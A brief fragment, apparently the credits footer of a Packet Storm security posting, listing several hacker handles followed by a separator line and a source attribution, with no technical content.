LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh    |=========================================================================================================================================

Source

Packet Storm